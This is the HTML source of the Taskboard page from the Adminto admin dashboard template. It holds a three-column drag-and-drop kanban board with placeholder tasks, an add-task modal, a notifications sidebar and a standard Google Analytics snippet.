<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <meta name="description" content="A fully featured admin theme which can be used to build CRM, CMS, etc.">
        <meta name="author" content="Coderthemes">

        <link rel="shortcut icon" href="assets/images/favicon.ico">

        <title>Adminto - Responsive Admin Dashboard Template</title>

        <!-- Custom box (Modal) css -->
        <link href="assets/plugins/custombox/dist/custombox.min.css" rel="stylesheet">
        <!-- Dragula (Drag and drop) css -->
        <link href="assets/plugins/dragula/dragula.min.css" rel="stylesheet">

        <link href="assets/css/bootstrap.min.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/core.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/components.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/icons.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/pages.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/menu.css" rel="stylesheet" type="text/css" />
        <link href="assets/css/responsive.css" rel="stylesheet" type="text/css" />

        <!-- HTML5 Shiv and Respond.js IE8 support of HTML5 elements and media queries -->
        <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
        <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script>
        <![endif]-->

        <script src="assets/js/modernizr.min.js"></script>

<script>
    (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
                    (i[r].q = i[r].q || []).push(arguments)
                }, i[r].l = 1 * new Date();
        a = s.createElement(o),
                m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');
    ga('create', 'UA-74137680-1', 'auto');
    ga('send', 'pageview');
</script>


    </head>


    <body>

        <!-- Navigation Bar-->
        <header id="topnav">
            <div class="topbar-main">
                <div class="container">

                    <!-- LOGO -->
                    <div class="topbar-left">
                        <a href="index.html" class="logo"><span>Admin<span>to</span></span></a>
                    </div>
                    <!-- End Logo container-->


                    <div class="menu-extras">

                        <ul class="nav navbar-nav navbar-right pull-right">
                            <li>
                                <form role="search" class="navbar-left app-search pull-left hidden-xs">
                                     <input type="text" placeholder="Search..." class="form-control">
                                     <a href=""><i class="fa fa-search"></i></a>
                                </form>
                            </li>
                            <li>
                                <!-- Notification -->
                                <div class="notification-box">
                                    <ul class="list-inline m-b-0">
                                        <li>
                                            <a href="javascript:void(0);" class="right-bar-toggle">
                                                <i class="zmdi zmdi-notifications-none"></i>
                                            </a>
                                            <div class="noti-dot">
                                                <span class="dot"></span>
                                                <span class="pulse"></span>
                                            </div>
                                        </li>
                                    </ul>
                                </div>
                                <!-- End Notification bar -->
                            </li>

                            <li class="dropdown user-box">
                                <a href="" class="dropdown-toggle waves-effect waves-light profile " data-toggle="dropdown" aria-expanded="true">
                                    <img src="assets/images/users/avatar-1.jpg" alt="user-img" class="img-circle user-img">
                                    <div class="user-status away"><i class="zmdi zmdi-dot-circle"></i></div>
                                </a>

                                <ul class="dropdown-menu">
                                    <li><a href="javascript:void(0)"><i class="ti-user m-r-5"></i> Profile</a></li>
                                    <li><a href="javascript:void(0)"><i class="ti-settings m-r-5"></i> Settings</a></li>
                                    <li><a href="javascript:void(0)"><i class="ti-lock m-r-5"></i> Lock screen</a></li>
                                    <li><a href="javascript:void(0)"><i class="ti-power-off m-r-5"></i> Logout</a></li>
                                </ul>
                            </li>
                        </ul>
                        <div class="menu-item">
                            <!-- Mobile menu toggle-->
                            <a class="navbar-toggle">
                                <div class="lines">
                                    <span></span>
                                    <span></span>
                                    <span></span>
                                </div>
                            </a>
                            <!-- End mobile menu toggle-->
                        </div>
                    </div>

                </div>
            </div>

            <div class="navbar-custom">
                <div class="container">
                    <div id="navigation">
                        <!-- Navigation Menu-->
                        <ul class="navigation-menu">
                            <li>
                                <a href="index.html"><i class="zmdi zmdi-view-dashboard"></i> <span> Dashboard </span> </a>
                            </li>
                            <li class="has-submenu">
                                <a href="#"><i class="zmdi zmdi-invert-colors"></i> <span> User Interface </span> </a>
                                <ul class="submenu megamenu">
                                    <li>
                                        <ul>
                                            <li><a href="ui-buttons.html">Buttons</a></li>
                                            <li><a href="ui-cards.html">Cards</a></li>
                                            <li><a href="ui-typography.html">Typography </a></li>
                                            <li><a href="ui-checkbox-radio.html">Checkboxs-Radios</a></li>
                                            <li><a href="ui-material-icons.html">Material Design Icons</a></li>
                                            <li><a href="ui-font-awesome-icons.html">Font Awesome</a></li>
                                            <li><a href="ui-themify-icons.html">Themify Icons</a></li>
                                        </ul>
                                    </li>
                                    <li>
                                        <ul>
                                            <li><a href="ui-modals.html">Modals</a></li>
                                            <li><a href="ui-notification.html">Notification</a></li>
                                            <li><a href="ui-range-slider.html">Range Slider</a></li>
                                            <li><a href="ui-components.html">Components</a>
                                            <li><a href="ui-sweetalert.html">Sweet Alert</a>
                                            <li><a href="ui-treeview.html">Tree view</a>
                                            <li><a href="ui-widgets.html">Widgets</a></li>
                                        </ul>
                                    </li>
                                </ul>
                            </li>

                            <li class="has-submenu">
                                <a href="#"><i class="zmdi zmdi-collection-text"></i><span> Forms </span> </a>
                                <ul class="submenu">
                                    <li><a href="form-elements.html">General Elements</a></li>
                                    <li><a href="form-advanced.html">Advanced Form</a></li>
                                    <li><a href="form-validation.html">Form Validation</a></li>
                                    <li><a href="form-wizard.html">Form Wizard</a></li>
                                    <li><a href="form-fileupload.html">Form Uploads</a></li>
                                    <li><a href="form-wysiwig.html">Wysiwig Editors</a></li>
                                    <li><a href="form-xeditable.html">X-editable</a></li>
                                </ul>
                            </li>

                            <li class="has-submenu">
                                <a href="#"><i class="zmdi zmdi-view-list"></i> <span> Tables </span> </a>
                                <ul class="submenu">
                                    <li><a href="tables-basic.html">Basic Tables</a></li>
                                    <li><a href="tables-datatable.html">Data Table</a></li>
                                    <li><a href="tables-editable.html">Editable Table</a></li>
                                </ul>
                            </li>

                            <li class="has-submenu">
                                <a href="#"><i class="zmdi zmdi-chart"></i><span> Charts </span> </a>
                                <ul class="submenu">
                                    <li><a href="chart-flot.html">Flot Chart</a></li>
                                    <li><a href="chart-morris.html">Morris Chart</a></li>
                                    <li><a href="chart-chartist.html">Chartist Charts</a></li>
                                    <li><a href="chart-other.html">Other Chart</a></li>
                                </ul>
                            </li>

                            <li class="has-submenu">
                                <a href="#"><i class="zmdi zmdi-collection-item"></i><span> Pages </span> </a>
                                <ul class="submenu">
                                    <li><a href="page-starter.html">Starter Page</a></li>
                                    <li><a href="page-login.html">Login</a></li>
                                    <li><a href="page-register.html">Register</a></li>
                                    <li><a href="page-recoverpw.html">Recover Password</a></li>
                                    <li><a href="page-lock-screen.html">Lock Screen</a></li>
                                    <li><a href="page-confirm-mail.html">Confirm Mail</a></li>
                                    <li><a href="page-404.html">Error 404</a></li>
                                    <li><a href="page-500.html">Error 500</a></li>
                                </ul>
                            </li>

                            <li class="has-submenu active">
                                <a href="#"><i class="zmdi zmdi-layers"></i><span>Extra Pages </span> </a>
                                <ul class="submenu megamenu">
                                    <li>
                                        <ul>
                                            <li><a href="extras-projects.html">Projects</a></li>
                                            <li><a href="extras-tour.html">Tour</a></li>
                                            <li class="active"><a href="extras-taskboard.html">Taskboard</a></li>
                                            <li><a href="extras-inbox.html">Mail</a></li>
                                            <li><a href="extras-taskdetail.html">Task Detail</a></li>
                                            <li><a href="extras-maps.html">Maps</a></li>
                                            <li><a href="extras-calendar.html" >Calendar</a></li>
                                            <li><a href="extras-contact.html">Contact list</a></li>
                                            <li><a href="extras-pricing.html">Pricing</a></li>
                                        </ul>
                                    </li>
                                    <li>
                                        <ul>
                                            <li><a href="extras-timeline.html">Timeline</a></li>
                                            <li><a href="extras-invoice.html">Invoice</a></li>
                                            <li><a href="extras-profile.html">Profile</a></li>
                                            <li><a href="extras-faq.html">FAQ</a></li>
                                            <li><a href="extras-gallery.html">Gallery</a></li>
                                            <li><a href="extras-email-template.html">Email template</a></li>
                                            <li><a href="extras-maintenance.html">Maintenance</a></li>
                                            <li><a href="extras-comingsoon.html">Coming soon</a></li>
                                        </ul>
                                    </li>
                                </ul>
                            </li>

                        </ul>
                        <!-- End navigation menu  -->
                    </div>
                </div>
            </div>
        </header>
        <!-- End Navigation Bar-->


        <div class="wrapper">
            <div class="container">

                <!-- Page-Title -->
                <div class="row">
                    <div class="col-sm-12">
                        <div class="btn-group pull-right m-t-15">
                            <button type="button" class="btn btn-custom dropdown-toggle waves-effect waves-light" data-toggle="dropdown" aria-expanded="false">Settings <span class="m-l-5"><i class="fa fa-cog"></i></span></button>
                            <ul class="dropdown-menu" role="menu">
                                <li><a href="#">Action</a></li>
                                <li><a href="#">Another action</a></li>
                                <li><a href="#">Something else here</a></li>
                                <li class="divider"></li>
                                <li><a href="#">Separated link</a></li>
                            </ul>
                        </div>
                        <h4 class="page-title">Taskboard</h4>
                    </div>
                </div>


                <div class="row">
                    <div class="col-md-4">
                        <div class="card-box taskboard-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30 text-primary">Upcoming</h4>

                            <ul class="list-unstyled task-list" id="drag-upcoming">
                                <li>
                                    <div class="card-box kanban-box">
                                        <div class="checkbox-wrapper">
                                            <div class="checkbox checkbox-success checkbox-single">
                                                <input type="checkbox" id="singleCheckbox2" value="option2"
                                                       aria-label="Single checkbox Two">
                                                <label></label>
                                            </div>
                                        </div>

                                        <div class="kanban-detail">
                                            <span class="label label-danger pull-right">Urgent</span>
                                            <h4><a href="">Improve animation loader</a> </h4>
                                            <ul class="list-inline m-b-0">
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="Username">
                                                        <img src="assets/images/users/avatar-2.jpg" alt="img"
                                                             class="thumb-sm img-circle">
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="5 Tasks">
                                                        <i class="zmdi zmdi-format-align-left"></i>
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="3 Comments">
                                                        <i class="zmdi zmdi-comment-outline"></i>
                                                    </a>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                </li>

                                <li>
                                    <div class="card-box kanban-box">
                                        <div class="checkbox-wrapper">
                                            <div class="checkbox checkbox-success checkbox-single">
                                                <input type="checkbox" id="singleCheckbox3" value="option3"
                                                       aria-label="Single checkbox Two">
                                                <label></label>
                                            </div>
                                        </div>

                                        <div class="kanban-detail">
                                            <span class="label label-warning pull-right">High</span>
                                            <h4><a href="">Write a release note for Ubol v1.5</a> </h4>
                                            <ul class="list-inline m-b-0">
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="Username">
                                                        <img src="assets/images/users/avatar-3.jpg" alt="img"
                                                             class="thumb-sm img-circle">
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="5 Tasks">
                                                        <i class="zmdi zmdi-format-align-left"></i>
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="3 Comments">
                                                        <i class="zmdi zmdi-comment-outline"></i>
                                                    </a>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                </li>

                                <li>
                                    <div class="card-box kanban-box">
                                        <div class="checkbox-wrapper">
                                            <div class="checkbox checkbox-success checkbox-single">
                                                <input type="checkbox" id="singleCheckbox4" value="option4"
                                                       aria-label="Single checkbox Two">
                                                <label></label>
                                            </div>
                                        </div>

                                        <div class="kanban-detail">
                                            <h4><a href="">Invite user to a project</a> </h4>
                                            <ul class="list-inline m-b-0">
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="Username">
                                                        <img src="assets/images/users/avatar-4.jpg" alt="img"
                                                             class="thumb-sm img-circle">
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="5 Tasks">
                                                        <i class="zmdi zmdi-format-align-left"></i>
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="3 Comments">
                                                        <i class="zmdi zmdi-comment-outline"></i>
                                                    </a>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                </li>


                                <li>
                                    <div class="card-box kanban-box">
                                        <div class="checkbox-wrapper">
                                            <div class="checkbox checkbox-success checkbox-single">
                                                <input type="checkbox" id="singleCheckbox5" value="option2"
                                                        aria-label="Single checkbox Two">
                                                <label></label>
                                            </div>
                                        </div>

                                        <div class="kanban-detail">
                                            <span class="label label-danger pull-right">Urgent</span>
                                            <h4><a href="">Code HTML email template for welcome email</a> </h4>
                                            <ul class="list-inline m-b-0">
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top" title="" data-original-title="Username">
                                                        <img src="assets/images/users/avatar-6.jpg" alt="img" class="thumb-sm img-circle">
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top" title="" data-original-title="5 Tasks">
                                                        <i class="zmdi zmdi-format-align-left"></i>
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top" title="" data-original-title="3 Comments">
                                                        <i class="zmdi zmdi-comment-outline"></i>
                                                    </a>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                </li>

                            </ul>

                            <div class="text-center">
                                <a href="#custom-modal" class="btn btn-default btn-md waves-effect waves-light"
                                   data-animation="fadein" data-plugin="custommodal" data-overlaySpeed="200" data-overlayColor="#36404a">
                                    <i class="zmdi zmdi-plus"></i> Add New
                                </a>
                            </div>
                        </div>
                    </div><!-- end col -->


                    <div class="col-md-4">
                        <div class="card-box taskboard-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30 text-warning">In Progress</h4>

                            <ul class="list-unstyled task-list" id="drag-inprogress">
                                <li>
                                    <div class="card-box kanban-box">
                                        <div class="checkbox-wrapper">
                                            <div class="checkbox checkbox-success checkbox-single">
                                                <input type="checkbox" id="singleCheckbox6" value="option6"
                                                       aria-label="Single checkbox Two">
                                                <label></label>
                                            </div>
                                        </div>

                                        <div class="kanban-detail">
                                            <span class="label label-danger pull-right">Urgent</span>
                                            <h4><a href="">File Uploads on cards</a> </h4>
                                            <ul class="list-inline m-b-0">
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="Username">
                                                        <img src="assets/images/users/avatar-4.jpg" alt="img"
                                                             class="thumb-sm img-circle">
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="5 Tasks">
                                                        <i class="zmdi zmdi-format-align-left"></i>
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="3 Comments">
                                                        <i class="zmdi zmdi-comment-outline"></i>
                                                    </a>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                </li>

                                <li>
                                    <div class="card-box kanban-box">
                                        <div class="checkbox-wrapper">
                                            <div class="checkbox checkbox-success checkbox-single">
                                                <input type="checkbox" id="singleCheckbox7" value="option7"
                                                       aria-label="Single checkbox Two">
                                                <label></label>
                                            </div>
                                        </div>

                                        <div class="kanban-detail">
                                            <span class="label label-warning pull-right">High</span>
                                            <h4><a href="">Enable analytics tracking</a> </h4>
                                            <ul class="list-inline m-b-0">
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="Username">
                                                        <img src="assets/images/users/avatar-6.jpg" alt="img"
                                                             class="thumb-sm img-circle">
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="5 Tasks">
                                                        <i class="zmdi zmdi-format-align-left"></i>
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="3 Comments">
                                                        <i class="zmdi zmdi-comment-outline"></i>
                                                    </a>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                </li>


                                <li>
                                    <div class="card-box kanban-box">
                                        <div class="checkbox-wrapper">
                                            <div class="checkbox checkbox-success checkbox-single">
                                                <input type="checkbox" id="singleCheckbox8" value="option8"
                                                       aria-label="Single checkbox Two">
                                                <label></label>
                                            </div>
                                        </div>

                                        <div class="kanban-detail">
                                            <h4><a href="">Improve animation loader</a> </h4>
                                            <ul class="list-inline m-b-0">
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="Username">
                                                        <img src="assets/images/users/avatar-7.jpg" alt="img"
                                                             class="thumb-sm img-circle">
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="5 Tasks">
                                                        <i class="zmdi zmdi-format-align-left"></i>
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="3 Comments">
                                                        <i class="zmdi zmdi-comment-outline"></i>
                                                    </a>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                </li>

                            </ul>

                            <div class="text-center">
                                <a href="#custom-modal" class="btn btn-default btn-md waves-effect waves-light"
                                   data-animation="fadein" data-plugin="custommodal" data-overlaySpeed="200" data-overlayColor="#36404a">
                                    <i class="zmdi zmdi-plus"></i> Add New
                                </a>
                            </div>
                        </div>
                    </div><!-- end col -->


                    <div class="col-md-4">
                        <div class="card-box taskboard-box">
                            <div class="dropdown pull-right">
                                <a href="#" class="dropdown-toggle card-drop" data-toggle="dropdown" aria-expanded="false">
                                    <i class="zmdi zmdi-more-vert"></i>
                                </a>
                                <ul class="dropdown-menu" role="menu">
                                    <li><a href="#">Action</a></li>
                                    <li><a href="#">Another action</a></li>
                                    <li><a href="#">Something else here</a></li>
                                    <li class="divider"></li>
                                    <li><a href="#">Separated link</a></li>
                                </ul>
                            </div>

                            <h4 class="header-title m-t-0 m-b-30 text-success">Complete</h4>

                            <ul class="list-unstyled task-list" id="drag-complete">
                                <li>
                                    <div class="card-box kanban-box">
                                        <div class="checkbox-wrapper">
                                            <div class="checkbox checkbox-success checkbox-single">
                                                <input type="checkbox" id="singleCheckbox10" value="option10"
                                                       aria-label="Single checkbox Two">
                                                <label></label>
                                            </div>
                                        </div>

                                        <div class="kanban-detail">
                                            <span class="label label-danger pull-right">Urgent</span>
                                            <h4><a href="">Improve animation loader</a> </h4>
                                            <ul class="list-inline m-b-0">
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="Username">
                                                        <img src="assets/images/users/avatar-2.jpg" alt="img"
                                                             class="thumb-sm img-circle">
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="5 Tasks">
                                                        <i class="zmdi zmdi-format-align-left"></i>
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="3 Comments">
                                                        <i class="zmdi zmdi-comment-outline"></i>
                                                    </a>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                </li>

                                <li>
                                    <div class="card-box kanban-box">
                                        <div class="checkbox-wrapper">
                                            <div class="checkbox checkbox-success checkbox-single">
                                                <input type="checkbox" id="singleCheckbox11" value="option11"
                                                       aria-label="Single checkbox Two">
                                                <label></label>
                                            </div>
                                        </div>

                                        <div class="kanban-detail">
                                            <span class="label label-warning pull-right">High</span>
                                            <h4><a href="">Write a release note for Ubol v1.5</a> </h4>
                                            <ul class="list-inline m-b-0">
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="Username">
                                                        <img src="assets/images/users/avatar-3.jpg" alt="img"
                                                             class="thumb-sm img-circle">
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="5 Tasks">
                                                        <i class="zmdi zmdi-format-align-left"></i>
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="3 Comments">
                                                        <i class="zmdi zmdi-comment-outline"></i>
                                                    </a>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                </li>


                                <li>
                                    <div class="card-box kanban-box">
                                        <div class="checkbox-wrapper">
                                            <div class="checkbox checkbox-success checkbox-single">
                                                <input type="checkbox" id="singleCheckbox12" value="option12"
                                                       aria-label="Single checkbox Two">
                                                <label></label>
                                            </div>
                                        </div>

                                        <div class="kanban-detail">
                                            <h4><a href="">Invite user to a project</a> </h4>
                                            <ul class="list-inline m-b-0">
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="Username">
                                                        <img src="assets/images/users/avatar-4.jpg" alt="img"
                                                             class="thumb-sm img-circle">
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="5 Tasks">
                                                        <i class="zmdi zmdi-format-align-left"></i>
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top"
                                                       title="" data-original-title="3 Comments">
                                                        <i class="zmdi zmdi-comment-outline"></i>
                                                    </a>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                </li>


                                <li>
                                    <div class="card-box kanban-box">
                                        <div class="checkbox-wrapper">
                                            <div class="checkbox checkbox-success checkbox-single">
                                                <input type="checkbox" id="singleCheckbox13" value="option13"
                                                        aria-label="Single checkbox Two">
                                                <label></label>
                                            </div>
                                        </div>

                                        <div class="kanban-detail">
                                            <span class="label label-danger pull-right">Urgent</span>
                                            <h4><a href="">Code HTML email template for welcome email</a> </h4>
                                            <ul class="list-inline m-b-0">
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top" title="" data-original-title="Username">
                                                        <img src="assets/images/users/avatar-6.jpg" alt="img" class="thumb-sm img-circle">
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top" title="" data-original-title="5 Tasks">
                                                        <i class="zmdi zmdi-format-align-left"></i>
                                                    </a>
                                                </li>
                                                <li>
                                                    <a href="" data-toggle="tooltip" data-placement="top" title="" data-original-title="3 Comments">
                                                        <i class="zmdi zmdi-comment-outline"></i>
                                                    </a>
                                                </li>
                                            </ul>
                                        </div>
                                    </div>
                                </li>

                            </ul>

                            <div class="text-center">
                                <a href="#custom-modal" class="btn btn-default btn-md waves-effect waves-light"
                                   data-animation="fadein" data-plugin="custommodal" data-overlaySpeed="200" data-overlayColor="#36404a">
                                    <i class="zmdi zmdi-plus"></i> Add New
                                </a>
                            </div>
                        </div>
                    </div><!-- end col -->
                </div>
                <!-- end row -->


                <!-- Modal -->
                <div id="custom-modal" class="modal-demo">
                    <button type="button" class="close" onclick="Custombox.close();">
                        <span>&times;</span><span class="sr-only">Close</span>
                    </button>
                    <h4 class="custom-modal-title">Add New</h4>
                    <div class="custom-modal-text text-left">
                        <form role="form">
                            <div class="form-group">
                                <label for="name">Task Name</label>
                                <input type="text" class="form-control" id="name" placeholder="">
                            </div>

                            <div class="row">
                                <div class="col-md-6">
                                    <div class="form-group">
                                        <label for="assign">Assign to</label>
                                        <input type="text" class="form-control" id="assign" placeholder="">
                                    </div>
                                </div>

                                <div class="col-md-6">
                                    <div class="form-group">
                                        <label for="priority">Priority</label>
                                        <input type="text" class="form-control" id="priority" placeholder="">
                                    </div>
                                </div>
                            </div>

                            <div class="row">
                                <div class="col-md-6">
                                    <div class="form-group">
                                        <label for="Sdate">Start Date</label>
                                        <input type="text" class="form-control" id="Sdate" placeholder="">
                                    </div>
                                </div>

                                <div class="col-md-6">
                                    <div class="form-group">
                                        <label for="Ddate">Due Date</label>
                                        <input type="text" class="form-control" id="Ddate" placeholder="">
                                    </div>
                                </div>
                            </div>

                            <button type="submit" class="btn btn-success waves-effect waves-light">Save</button>
                            <button type="button" class="btn btn-danger waves-effect waves-light m-l-5">Cancel</button>
                        </form>
                    </div>
                </div>


                <!-- Footer -->
                <footer class="footer text-right">
                    <div class="container">
                        <div class="row">
                            <div class="col-xs-6">
                                2016 © Adminto.
                            </div>
                            <div class="col-xs-6">
                                <ul class="pull-right list-inline m-b-0">
                                    <li>
                                        <a href="#">About</a>
                                    </li>
                                    <li>
                                        <a href="#">Help</a>
                                    </li>
                                    <li>
                                        <a href="#">Contact</a>
                                    </li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </footer>
                <!-- End Footer -->

            </div>
            <!-- end container -->



            <!-- Right Sidebar -->
            <div class="side-bar right-bar">
                <a href="javascript:void(0);" class="right-bar-toggle">
                    <i class="zmdi zmdi-close-circle-o"></i>
                </a>
                <h4 class="">Notifications</h4>
                <div class="notification-list nicescroll">
                    <ul class="list-group list-no-border user-list">
                        <li class="list-group-item">
                            <a href="#" class="user-list-item">
                                <div class="avatar">
                                    <img src="assets/images/users/avatar-2.jpg" alt="">
                                </div>
                                <div class="user-desc">
                                    <span class="name">Michael Zenaty</span>
                                    <span class="desc">There are new settings available</span>
                                    <span class="time">2 hours ago</span>
                                </div>
                            </a>
                        </li>
                        <li class="list-group-item">
                            <a href="#" class="user-list-item">
                                <div class="icon bg-info">
                                    <i class="zmdi zmdi-account"></i>
                                </div>
                                <div class="user-desc">
                                    <span class="name">New Signup</span>
                                    <span class="desc">There are new settings available</span>
                                    <span class="time">5 hours ago</span>
                                </div>
                            </a>
                        </li>
                        <li class="list-group-item">
                            <a href="#" class="user-list-item">
                                <div class="icon bg-pink">
                                    <i class="zmdi zmdi-comment"></i>
                                </div>
                                <div class="user-desc">
                                    <span class="name">New Message received</span>
                                    <span class="desc">There are new settings available</span>
                                    <span class="time">1 day ago</span>
                                </div>
                            </a>
                        </li>
                        <li class="list-group-item active">
                            <a href="#" class="user-list-item">
                                <div class="avatar">
                                    <img src="assets/images/users/avatar-3.jpg" alt="">
                                </div>
                                <div class="user-desc">
                                    <span class="name">James Anderson</span>
                                    <span class="desc">There are new settings available</span>
                                    <span class="time">2 days ago</span>
                                </div>
                            </a>
                        </li>
                        <li class="list-group-item active">
                            <a href="#" class="user-list-item">
                                <div class="icon bg-warning">
                                    <i class="zmdi zmdi-settings"></i>
                                </div>
                                <div class="user-desc">
                                    <span class="name">Settings</span>
                                    <span class="desc">There are new settings available</span>
                                    <span class="time">1 day ago</span>
                                </div>
                            </a>
                        </li>

                    </ul>
                </div>
            </div>
            <!-- /Right-bar -->

        </div>



        <!-- jQuery  -->
        <script src="assets/js/jquery.min.js"></script>
        <script src="assets/js/bootstrap.min.js"></script>
        <script src="assets/js/detect.js"></script>
        <script src="assets/js/fastclick.js"></script>
        <script src="assets/js/jquery.slimscroll.js"></script>
        <script src="assets/js/jquery.blockUI.js"></script>
        <script src="assets/js/waves.js"></script>
        <script src="assets/js/wow.min.js"></script>
        <script src="assets/js/jquery.nicescroll.js"></script>
        <script src="assets/js/jquery.scrollTo.min.js"></script>

        <!-- drgula (Drag and drop) js -->
        <script src="assets/plugins/dragula/dragula.min.js"></script>

        <!-- Modal-Effect -->
        <script src="assets/plugins/custombox/dist/custombox.min.js"></script>
        <script src="assets/plugins/custombox/dist/legacy.min.js"></script>

        <!-- App js -->
        <script src="assets/js/jquery.core.js"></script>
        <script src="assets/js/jquery.app.js"></script>

        <script type="text/javascript">
            dragula([document.querySelector('#drag-upcoming'), document.querySelector('#drag-inprogress'), document.querySelector('#drag-complete')], {
                isContainer: function (el) {
                    return false; // only elements in drake.containers will be taken into account
                },
                moves: function (el, source, handle, sibling) {
                    return true; // elements are always draggable by default
                },
                accepts: function (el, target, source, sibling) {
                    return true; // elements can be dropped in any of the `containers` by default
                },
                invalid: function (el, handle) {
                    return false; // don't prevent any drags from initiating by default
                },
                direction: 'vertical',             // Y axis is considered when determining where an element would be dropped
                copy: false,                       // elements are moved by default, not copied
                copySortSource: false,             // elements in copy-source containers can be reordered
                revertOnSpill: false,              // spilling will put the element back where it was dragged from, if this is true
                removeOnSpill: false,              // spilling will `.remove` the element, if this is true
                mirrorContainer: document.body,    // set the element that gets mirror elements appended
                ignoreInputTextSelection: true     // allows users to select input text, see details below
            });
        </script>

